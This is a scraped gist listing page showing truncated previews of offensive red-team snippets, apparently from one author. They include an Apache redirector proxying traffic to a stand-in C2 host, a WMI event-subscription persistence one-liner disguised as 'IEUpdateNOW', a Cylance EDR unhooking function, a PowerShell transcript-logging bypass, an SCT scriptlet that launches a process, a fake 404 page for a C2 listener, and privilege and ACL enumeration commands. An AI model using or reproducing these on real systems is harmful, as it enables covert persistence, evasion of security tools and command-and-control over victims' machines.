This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sub RunMe() | |
' | |
' Menu -> Tool -> References -> Microsoft Script Control 1.0 & Enable by Clicking it | |
' | |
' | |
Dim jsObj As New ScriptControl | |
Dim Result As Integer | |
jsObj.Language = "JScript" | |
With jsObj |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# whitelist need to be formatted like so | |
# 104.44.44.44 - | |
# 104.33.33.33 - | |
RewriteMap ips txt:/opt/whitelist.txt | |
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND | |
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC] | |
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.EnterpriseServices; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 | |
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll | |
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
([Security.Principal.WindowsIdentity]::GetCurrent()); | |
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | |
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows- | |
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless- | |
Backdoor-wp.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Unhook-Cylance() { | |
$winapi = @" | |
using System.Runtime.InteropServices; | |
using System; | |
public class Win32 { | |
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)] | |
public static extern IntPtr memcpy(IntPtr dest, string src, uint count); | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<cOmPoNeNt><sCRipT> | |
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0"); | |
</sCRipT></cOmPoNeNt> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$serverport = '$port' | |
$httpresponse = ' | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL was not found on this server.</p> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation |
OlderNewer